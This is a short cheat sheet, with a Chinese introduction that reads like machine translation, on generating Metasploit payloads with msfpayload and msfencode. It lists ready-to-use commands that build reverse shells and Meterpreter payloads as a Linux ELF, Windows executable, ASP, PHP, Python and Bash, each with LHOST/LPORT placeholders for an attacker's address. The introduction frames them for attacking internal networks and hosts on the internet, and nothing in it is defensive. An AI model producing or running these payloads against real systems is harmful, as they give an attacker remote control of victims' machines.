Creating Metasploit Payloads
运行‘set payload’相关有效载荷使用和配置所有必需的选项(lhost,lport,etc)执行并等待负载运行。在下面的例子是漂亮的自我解释,但lhost应填写您的IP地址(LAN IP攻击内部网络,WAN IP攻击在互联网上),和lport应该是你希望被连接在端口。有效载荷列表
msfpayload -l
Create a Linux Reverse MeterpreterBinary
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address>LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell
Create Reverse Shell (Shellcode)
msfpayload windows/shell_reverse_tcp LHOST=<Your IP Address>LPORT=<Your Port to Connect On> R | msfencode -b"\x00\x0a\x0d"
Create a Reverse Shell Python Script
msfpayload cmd/unix/reverse_python LHOST=<Your IP Address>LPORT=<Your Port to Connect On> R > shell.py
Create a Reverse ASP Shell
msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address>LPORT=<Your Port to Connect On> R | msfencode -t asp -o shell.asp
Create a Reverse Bash Shell
msfpayload cmd/unix/reverse_bash LHOST=<Your IP Address>LPORT=<Your Port to Connect On> R > shell.sh
Create a Reverse PHP Shell
msfpayload php/meterpreter_reverse_tcp LHOST=<Your IP Address>LPORT=<Your Port to Connect On> R > shell.php
Edit shell.php in a text editor to add <?php at the beginning.
Create a Windows Reverse Meterpreter Binary
msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address>LPORT=<Your Port to Connect On> X >shell.exe